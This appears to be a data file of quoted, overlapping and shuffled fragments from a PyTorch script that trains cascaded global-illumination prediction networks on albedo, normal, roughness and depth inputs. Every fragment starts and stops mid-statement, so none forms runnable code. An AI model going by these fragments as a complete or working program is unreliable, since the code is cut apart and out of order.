"opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and",
"globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier opGlobalIllu1to2 =",
"= globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999)",
"fine-tune the network or not') parser.add_argument('--epochId', type=int, default = -1, help='the training epoch",
"torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The locationi of training set parser.add_argument('--dataRoot',",
"= 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 =",
"print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")",
"+ 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] +",
"# Load data from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu )",
"parser = argparse.ArgumentParser() # The locationi of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to",
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch,",
"1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) )",
"optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize)",
"[1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog =",
"pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) *",
"j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut =",
"* (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum(",
"level of cascades should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0",
"= random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not",
"= models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) )",
") imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"Load data from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu",
"* segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment,",
"type=int, default=0, help='how much level of cascades should we use') opt = parser.parse_args()",
"import models import torchvision.utils as vutils import utils import dataLoader from torch.utils.data import",
"globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0, n +",
") imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu )",
"opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment ) g2W,",
":], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :],",
"enumerate(brdfLoader): j += 1 # Load data from cpu to gpu albedo_cpu =",
"globalIllu3s = [] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch,",
"= np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w')",
"opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize,",
"############## ###################### # Send things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch",
"epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)],",
"trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j ==",
"parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path to store samples and",
"sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum",
"The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades should",
"rate if (epoch + 1) % 2 == 0: for param_group in opGlobalIllu1to2.param_groups:",
"totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() #",
"== 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups:",
"print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You",
"# The locationi of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None,",
"Send things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch",
"should probably run with --cuda\") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3,",
"sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step()",
"parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width",
"betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader =",
"size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input image to",
"opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is None: opt.experiment",
"os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment ) g2W, g3W = opt.globalIllu2,",
"The locationi of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the",
"np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype =",
"epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog,",
"parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the network') # The",
"default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path to store samples and models')",
"parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training network') # The training",
"= opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \",",
"= np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1,",
"gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu )",
"opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3,",
"--cuda\") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch",
"globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 =",
"opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1,",
"imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle",
"vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close()",
"= np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j",
"of global illumination prediction 3') # Fine Tune the network parser.add_argument('--isFineTune', action =",
"\", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a",
"= 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment ) g2W, g3W",
"epoch, j) if j == 1 or j == 1000 or j% 2000",
"weight of global illumination prediction 3') # Fine Tune the network parser.add_argument('--isFineTune', action",
"utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:',",
"1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList=",
"j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch,",
"default=0, help='how much level of cascades should we use') opt = parser.parse_args() print(opt)",
"Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId)",
"parser.add_argument('--experiment', default=None, help='the path to store samples and models') # The basic training",
":], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :],",
"the ground truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j)",
") imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the",
":], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1,",
"trainingLog.close() # Update the training rate if (epoch + 1) % 2 ==",
"roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape)",
"normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape)",
"import dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The locationi of",
") vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image(",
"training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path to store",
"normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch",
"network or not') parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the",
"set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path to store samples",
"input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the",
"we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is",
"Save the predicted results for n in range(0, opt.cascadeLevel + 1): vutils.save_image( (",
"= np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in",
"trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList,",
"trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1,",
"You have a CUDA device, so you should probably run with --cuda\") ####################################",
"if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### #",
"imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu",
"- imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0",
"axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0),",
"globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate(",
"axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu',",
"1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data",
"utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j)",
") segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize,",
"opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j",
"for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch),",
"albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape)",
"if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s'",
"cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape)",
"dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones(",
"= roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch =",
"2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment,",
"[globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000:",
"globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send things into GPU if opt.cuda:",
"the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or not')",
"not opt.cuda: print(\"WARNING: You have a CUDA device, so you should probably run",
"np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j == 1 or j ==",
"j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) )",
"opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999)",
"import os import models import torchvision.utils as vutils import utils import dataLoader from",
"help='how much level of cascades should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel",
"import random import os import models import torchvision.utils as vutils import utils import",
"opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize,",
"roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch",
"opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available()",
"np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog",
"j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1",
") / pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr",
"type=float, default=1, help='the weight of global illumination prediction 3') # Fine Tune the",
"globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch],",
"globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send things",
"0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr']",
"segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape)",
"optim import argparse import random import os import models import torchvision.utils as vutils",
"= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ):",
"to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu",
") vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image(",
"np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j <",
"predicted results for n in range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n]",
":], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu',",
"( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( (",
"torch.sum(segBatch ).cpu().data.item() for m in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] -",
"1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the training rate",
"training epoch of the network') # The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0,",
"[1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)",
"help='the gpus used for training network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1,",
"illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3')",
"torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum",
"axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1,",
"vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( (",
"j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch +",
") inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach()",
"the training rate if (epoch + 1) % 2 == 0: for param_group",
"np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) ) torch.save(globIllu2to3.state_dict(),",
"j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j == 1 or",
"brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False) j",
"= argparse.ArgumentParser() # The locationi of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images')",
"(globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m]",
"help='the training epoch of the network') # The detail network setting parser.add_argument('--cascadeLevel', type=int,",
").data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch)",
"j) ) # Save the predicted results for n in range(0, opt.cascadeLevel +",
"# Save the predicted results for n in range(0, opt.cascadeLevel + 1): vutils.save_image(",
"axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j",
"prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3') #",
"training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog,",
"= np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0),",
") vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 /",
"albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs",
"segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m]",
"depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut -",
"parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3') # Fine Tune",
":], axis=0), trainingLog, epoch, j) if j == 1 or j == 1000",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch",
"0 ) if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp",
"globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) /",
"epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j == 1",
"print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir",
"range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment,",
"import torchvision.utils as vutils import utils import dataLoader from torch.utils.data import DataLoader parser",
